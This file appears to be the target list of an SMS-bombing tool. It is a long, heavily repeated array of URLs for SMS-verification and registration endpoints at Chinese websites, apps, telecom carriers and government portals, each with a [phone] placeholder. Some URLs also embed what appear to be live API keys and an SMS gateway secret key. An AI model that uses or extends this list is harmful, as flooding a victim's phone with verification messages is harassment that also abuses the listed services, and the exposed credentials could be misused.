"http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://server.daiyudianjing.com/User/GetShortMessage?phone=[phone]&type=0&Timestamp=1562547880955&Nonstr=4A4EC434EC1697BAB69253B3293FF032", - "http://api.passport.pptv.com:80/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://login-user.kugou.com/v1/send_sms_for_reg?appid=1014&callback=GetSmsCodeCallbackFn&v=1&verifycode=&ct=1546670699&type=reg&mid=07546126fef194aa4b29a5a80ec7a8d1&kguser_jv=180925&mobile=[phone]", - "http://app.quanlaoda.com/app.php?&m=code&a=send_login_code&phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://passport.58.com/mobileauthcodelogin/getcode?validatecode=?=true&source=m-my&callback=jsonp_callback2&mobile=[phone]", - "http://www.zuisgo.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&firewallToken=jkjslfskjk8545sfsdf&uid=&token=&loginTime=&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", - "http://www.maimaishichang.com/m/reg/motregchk.php?mob=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", - "http://m.cstm.org.cn/wxReg/regPhoneCheck?regPhone=[phone]", - "http://app.zhigoukeji.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=e6d1fbbdcd5975b310190544e9f45015", - "http://api.sssc.cn/seccode/reg?callback=&m=[phone]", - "http://www.faka866.com/index/checkuser?Mobile=[phone]&act=sj_reg_telma&t=1589617288409", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://masterhands.yladm.com/user/phone/verifycode?app=gaoshou_i&brand=apple&idfa=5C351103-F887-4932-BC59-58C75875EFDE&model=iphone&phone=[phone]&refer=hometabpage&sid=appstore&sign=dfe50ccd14bb2c905e37b4706c5e633c&tcid=5f401e59cddf4345a511010d2c268592&timestamp=1", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "https://helper.2bulu.com/sendValidateCode?p_userId=0&p_productType=0&p_terminalType=2&p_appVersion=6.1.0&mobileNumber=[phone]&unique=1&areaCode=86", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]&_=1506486656411", - "http://www.id68.cn/member/common/ckuser/ m=mobile&a=isMobile&format=ajax&mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=15", - "http://vapi.yuike.com/1.0/user/is_register.php?phone=[phone]&sign=69f0ce3725947d7f9d6b798e68700f3a&yk_pid=3&yk_appid=1&yk_cc=yuikemall&yk_cvc=319&mid=457465", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://idecoration.ikongjian.com/user/fetchCode?&deviceId=7676F5C4-1919-4FC8-9436-BBFD5BE87482&mobile=[phone]&type=1&token=YzVkMGVlYWMtZTU4My00MTc2LWJkMzYtZGZlMWRjODgwYjBkZDBiMDg4Y2QxZWZkLTYzZGItNjcxNC0zODVlLWNhZWUwZDVj", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://www.huizhuang.com/m/login/getmobilecode?cate=login&mobile=[phone]&_=1551173567935", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "http://wx01.lecake.com/customer/get-code.html?mobile=[phone]&yzm=148323267", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://w.xyhsoft.com:80/pypay/xyhpay/util/ZsendCode.do?phone=[phone]", - "http://wap.zt.raiyi.com/weixin/bind/verifyMobile?mobile=[phone]&appCode=fc_wx&buyChannel=OfficialAccounts&vtype=0", - "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?publishid=1003&deviceId=2808ec7ef7fbeed6&df=android&vt=5&screen=1080x1920&deviceid=2808ec7ef7fbeed6&proid=qknode&os=android&av=NMF26X&appVersion=1.4.0&imei=865499038835144&ov=7.1.1&osVersion=7.1.1&osLevel=25&phone=[phone]", - "http://user.app.nanrenbang.in/user/user/getvalidate?phone=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://i.im.etiantian.net/app-common-service/getPhoneValidateCodeForAixue.do?time=1563804384352&appId=561&typeId=1&uType=6&phoneNum=[phone]&sign=MjhhOTc4YzQ3YjBhZmFhZmRmZDkzY2ViMzRmZmM3ZjA", - "https://appapi.moretickets.com/userapi/pub/v1_1/send_sms_for_regist?cellphone=[phone]&code=&isSupportSession=1&src=ios&token=5d3fa06f6d96f74c953459ba&ver=5.1.2", - "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]", - "http://koudaitong.com/v2/common/sms/captcha.jsonp?callback=jQuery1102020099561656467435_1430461129946&verifyTimes=1&biz=kdt_account_captcha&_=1430461129949&mobile=[phone]", - "https://new.yohoboys.com/yohonow/api/register/registerSms?appType=2&app_version=5.9.4&area=86&client_secret=1296d0321e51188e17e698e128961947&client_type=iphone&curVersion=5.9.4&degrees=%5B%5D&fromPage=iFP_Nlogin&language=zh-Hans&mobile=[phone]&os_version=12.4&scree", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://services.qiye.163.com/service/official/sendCode?jsonpcallback=jQuery190039810459070645865_1584688891341&mobile=[phone]&_=1584688891342", - "http://hbrbapi.hubeidaily.net/amc/client/getAuthCode?mobilephone=[phone]&nodeCode=ecdc5307-888e-4322-8817-f04bd81a7e82", - "https://p.doras.api.vcinema.cn/v5.0/user/[phone]/send_code", - "http://api.wangxiao.cn/app/user.ashx?mobile=[phone]&t=mobilelogincode", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://106.12.43.240/api.php?act=user&key=m898F3fn4rf53j643T42&phone=[phone]", - "http://m.yhk188.com/register/sendAppRegMsg.dos?channel=1&mobilephone=[phone]&time=8a0aae56fd56e3d023102a88e57a4a594a1625c5769a666d42a35e5b5933c01b&type=1&version=1.6.1", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://common.apis.tod.top/v1.1.0/sendsms.php?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=13", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.dangaoss.com/h5/acc/send_code?_t=1552475308&sign=424064b2d2d003d83db05380438824cb&username=[phone]", - "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", - "http://www.6dspeaker.com/sdspeaker/public?method=getPhoneCode&phone=[phone]&countryCode=%2B86&validateType=1", - "https://john.ixiaolu.com/account/check_account_name?ab_ver=A&account_name=86-[phone]&app_channel=&device=iPhone8%2C1&device_id=5C351103-F887-4932-BC59-58C75875EFDE&login_user_id=0&pcid=ae1895f8187711a6bf727e6d14b0588d&phone_sn=9e633777bc1a27c4cb826b1a4c6309dd34eb80", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://hz.95sc.cn/api.php?act=user&key=7awn1zd6tRCRuTDD1c&phone=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi 4A&osLevel=23&phone=[phone]&token=", - "https://passport.ziroom.com/verify/code/v2?phone=[phone]&type=1", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E9%AA%8C%E8%AF%81%E7%A0%81%E4%B8%BA%EF%BC%9A3973+%EF%BC%8C%E8%AF%A5%E9%AA%8C%E8%AF%81%E7%A0%8110%", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=18", - "http://ketang.ldcstudy.com/nsuser/h5/getCode.vm?phone=[phone]&servicekey=", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=13", - "http://doc.u-ease.com:80/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", - "http://ketang.ldcstudy.com/nsuser/h5/getCode.vm?phone=[phone]&servicekey=", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://api2.cloudlinks.cn:80/Users/PhoneCheckCode.ashx?CountryCode=86&PhoneNO=[phone]&AppVersion=6357251", - "https://appapi.moretickets.com/userapi/pub/v1_1/send_sms_for_regist?cellphone=[phone]&code=&isSupportSession=1&src=ios&token=5d3fa06f6d96f74c953459ba&ver=5.1.2", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://gwc.drugs360.cn/index.php?r=UserCenter/getCellphoneCode&type=4&cellphone=[phone]&city=%E9%87%8D%E5%BA%86%E5%B8%82&lat=29.593100&lng=106.291519&version=6.1&os=ios&auth=1&sign=1ae1dda00913d0707905455258cd5045", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=25", - "https://ddxq.mobi/api/v1/user/mobile/check/?api_version=8.30.2&app_client_id=1&channel=App%20Store&countryCode=CN&device_id=a3bd2adebf3a389bb044fea62d52c8c55a1577ce&device_model=iPhone8%2C1&device_name=iPhone%206s&languageCode=zh&latitude=29.587192&localeIdentifier", - "https://ddxq.mobi/api/v1/user/mobile/check/?api_version=8.30.2&app_client_id=1&channel=App%20Store&countryCode=CN&device_id=a3bd2adebf3a389bb044fea62d52c8c55a1577ce&device_model=iPhone8%2C1&device_name=iPhone%206s&languageCode=zh&latitude=29.587192&localeIdentifier", - "http://www.zkzcfu.cn/api/sms/send?mobile=[phone]&event=register", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]&_=1506486656411", - "https://ly.hao315.com/MsgYzm.php?tel=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://m.mgqr.com/ajax/getcode.ashx?check=0&t=1586567002298&phone=[phone]", - "http://voip-newapi20160601.voip-oem.com/api/Account/GetValidateCodeNoUser?SrcPhone=[phone]&type=1&proxyId=5318302", - "https://api.xinmaotong.cn/flw-auth/code?phone=[phone]&type=0", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://jz.gymchina.com/api/user/getVerificationCode.json?phone=[phone]&platform=and&sid=43d54311742a6c62a11ef8b64d8c7ac1&brand=OPPO&version=2.2.6&appName=tomato&partner=xiaomi&model=PCRT00", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://jyqb.jyqb168.com/registerH5/registerCode?phone=[phone]", - "http://ketang.ldcstudy.com/nsuser/h5/getCode.vm?phone=[phone]&servicekey=", - "https://love.163.com/open/api/login/phone/checkStatus?86=areaCode&phone=[phone]", - "http://www.gkbbapp.com/Support/JsonNews.aspx?sendShortMessage=yes&Telephone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]", - "https://sso-c.souche.com/loginApi/getCaptchaUrlByPhone.json?app=tangeche&phone=[phone]", - "https://passport.tianya.cn/ssl/sendSMSCode.do?countryCode=0086&mobile=[phone]&signature=ec57ab48b2c35a1f71e21989bccbcee9&uuid=385e205a-505b-49f1-a28d-abacf0c65012", - "http://mobile.yougou.com/v_1.8/quicklyLoginMobileverify?username=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=9", - "https://doctor.helianhealth.com/api/v3/auth/common/getSMScode?cellphone=[phone]&sign=d821db6c5629ea532b9f8ff95e39e952&smsType=1&timestamp=1568266253&type=1", - "https://a1.go2yd.com/Website/user/login-mobile?platform=1&androidId=3d733e2a62588cd977f14876331368d1&deviceId=5284047f4ffb4e04824a2fd1d1f0cd62&cv=4.8.8.1&secret=7a0a51884d933ea12bc8531edb05147468a8f136&reqid=czak52qh_1547987726471_360&brand=Xiaomi&mobile=8618529142", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=7", - "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", - "http://user.app.nanrenbang.in/user/user/getvalidate?phone=[phone]", - "https://ucenter.1haitao.com/vc/mobile/SMSCode.htm?codeType=login&mobile=[phone]&sign=ea7f6860aa40d220409b892397890184", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://i.xfvw.cn/api/sms/send?mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://www.zuisgo.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&firewallToken=jkjslfskjk8545sfsdf&uid=&token=&loginTime=&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://www.hx2car.com/mobile/loginCode.json?code=d889c6084be2613b8ed976d2336bc53a&devicetoken=0FAEEA4E-B279-4409-93A6-05B4EDE49DE8&phoNum=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://park.chemi.ren//serverpark/index.php/Api/Mobileapi/getCode?phone=[phone]", - "https://id.seewo.com/api/recordSEM?systemCode=care&appVersion=%E5%B8%8C%E6%B2%83%E5%AD%A6%E9%99%A2SEM&actionType=1111004&channelName=care&deviceId=&_=1547004660553&userId=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://app.quyiyuan.com/APP/user/action/LoginAction.jspx?APPOINT_SOURCE=0&CHANNEL_ID=&IMEI_ID=3ECFD13A-235B-47A9-A9E1-F4DCC64D360F&PHONEOPERATINGSYS=2&PHONETYPE=iPhone8,1&PHONEVERSIONNUM=12.4.1&PHONE_NUMBER=[phone]&PUBLIC_SERVICE_TYPE=0&hospitalID=&isRead=1&loc=c&", - "http://passport.58.com/mobileauthcodelogin/getcode?valIDAtecode=?=true&source=m-my&callback=jsonp_callback2&mobile=[phone]", - "http://www.ydhz.xyz/index.php?hm=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://klfsh.mangguohd.com/mghdSys/android/sign/sendMobileVerifyCode/[phone]", - "http://passport.58.com/mobileauthcodelogin/getcode?validatecode=?=true&source=m-my&callback=jsonp_callback2&mobile=[phone]", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "https://appapi.51job.com/api/user/get_verification_type.php?mobilephone=[phone]&nation=CN&type=0&format=json&guid=56fa5d7a032a8190dd9844ebaa211181&partner=237b12de4c48eacec5a368eb192c3c5e&productname=51job&uuid=e7ab248c2ba73cb851a1eb31aa138695&version=869", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://gk.huixinyt.com/app1dxxy/index.php/Index/getcode1?1=1&mobile=[phone]&_=1551173567907", - "http://photograph.yuanlikj.cn/send/Send?appName=%E6%88%AA%E5%9B%BE%E7%A7%80-%E5%AF%B9%E8%AF%9D%E7%94%9F%E6%88%90%E5%99%A8&TELMobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data=%7B%22phone%22%3A%22[phone]%22%2C%22type%22%3A%223%22%2C%22userId%22%3A%22%22%7D&head=%7B%22account%22%3A%22android01%22%2C%22channel%22%3A%22C0001%22%2C%22channelSecond%22%3A%22CS0001%22%2C%22pa", - "http://www.xyqb.com/LKB/lg/sendSms.html?random=&loginName=[phone]", - "https://soufunapp.3g.fang.com/http/sfservice.jsp?messagename=appSendMobileCode&mobilephone=[phone]&operatetype=0&sendvoice=0&wirelesscode=2C56469F49A8526BC922ECFA14C22AC7", - "http://bj.iguanyu.com/gywebsite/common/sendVerificationCode?phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://user.yuntuds.net/register_get_valid_number?sign=a316b3d460901f104f9e8e84662640c0&phone_number=[phone]&nwtime=1548162361&_u=acde09261c08497067779e1fd4ee4a6e&version=4.5.1&platform=android&appx=yuntu&apppn=org.fungo.fungolive&channel=tencent&market=32&os_versi", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]&token=", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.jxxw.com.cn/app/user/sendLoginCode?username=[phone]&sign=572bf336d708a2b8b655ea05872cb596", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=4", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://v2.tgmmvip.com:80/wolong/user/getphonecode?phone=[phone]&deviceid=864680046080077&type=0", - "https://client.cangshuyuedu.com/api/Sys/SendSmsAuthCode?callback=jQuery111009421744498287961_1580993309090&pType=4&app_version=2.0.7&pkgname=com.yokong.bookfree&channel_id=1&device_id=f75c53c90f4a6635d5f6c7136120154d&mob=[phone]&platform=IOS&uid=0&token=bfd31758556", - "http://howe.xiumaikeji.com/api/v1/howeFront/user/userIsRegist?phone=[phone]", - "http://jieapi.profacty.cn/api/verification/sendPhone?phone=[phone]&type=102&timestamp=1559301154413&sign=e720200313338403aaa8e13a3f333da7", - "http://www.newtank.cn/newtank/act/sendCaptcha.do?activityId=161&channelId=15399&_d=1506594279964&mobile=[phone]&_=1551173567874", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://server.daiyudianjing.com/User/GetShortMessage?phone=[phone]&type=0&Timestamp=1562547880955&Nonstr=4A4EC434EC1697BAB69253B3293FF032", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://puser.funshion.com/user/sendappsmscodenocaptcha?app=main&app_code=iphone&cl=iphone&content=%E6%82%A8%E7%9A%84%E7%9F%AD%E4%BF%A1%E9%AA%8C%E8%AF%81%E7%A0%81%E6%98%AF%3A%25verifycode%25%E3%80%82%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E5%8F%B7%E6%AD%A3%E5%9C%A8%E4%", - "http://www.gmsweipai.com/gms/api/common/[phone]/requestsms/5?mchCode=861913032338784", - "https://mobile.cmbchina.com/DUserManage/UserRegisterNew/URN_Register.aspx?phoneNo=[phone]&showtopbar=true&DeviceType=E&Version=7.1.2&SystemVersion=6.0.1&behavior_entryid=lgf005001", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "https://api.aihecong.com/account/vercode?type=register&antiBrush=ecdfddd24937106ex&callback=JSONP_1580388414994&tel=[phone]", - "http://m.cqrenrenle.com/v3/users/code?mobile=[phone]&from=reg&packagename=com.feifan.app&platform=android", - "https://new.yohoboys.com/yohonow/api/register/registerSms?appType=2&app_version=5.9.4&ararea=86&client_secret=1296d0321e51188e17e698e128961947&client_type=iphone&curVersion=5.9.4&degrees=%5B%5D&fromPage=iFP_Nlogin&language=zh-Hans&mobile=[phone]&os_version=12.4&scree", - "http://www.shengjob.com/Resume/PhoneCode_Tem.aspx?Phones=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://appv2.lygou.cc/loyouser/getBindCode?appfrom=203&appver=3.2.2&identity=%2B86[phone]&platform=2&realVer=3.2.2&region=zh-CN&time_zone=28800&type=0&unlogin_token=724767db76a9c95e817d0101be771480&version_code=138", - "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=&app_code=ECS-YH-WAP", - "http://splus.bianfeng.com/index.php?r=findAccount/SendCode&rnd=&a=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", - "http://qhg.api.nbxuanma.com/api/VerifyCode/Send?Phone=[phone]", - "http://newm.yktour.com.cn/api/captcha/login/info/get?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://jjy.3g.fang.com/httpclient/agentservice.jsp?groupFlag=ESF&messagename=jjy_getPassportandCustomerIds&phone=[phone]&wirelesscode=57b34f0c5725ee3d9e76c2619c394ae8", - "http://v2.tgmmvip.com:80/wolong/user/getphonecode?phone=[phone]&deviceid=864680046080077&type=0", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://john.ixiaolu.com/account/check_account_name?ab_ver=A&account_name=86-[phone]&app_channel=&device=iPhone8,1&device_id=5C351103-F887-4932-BC59-58C75875EFDE&login_user_id=0&pcid=ae1895f8187711a6bf727e6d14b0588d&phone_sn=9e633777bc1a27c4cb826b1a4c6309dd34eb80", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - 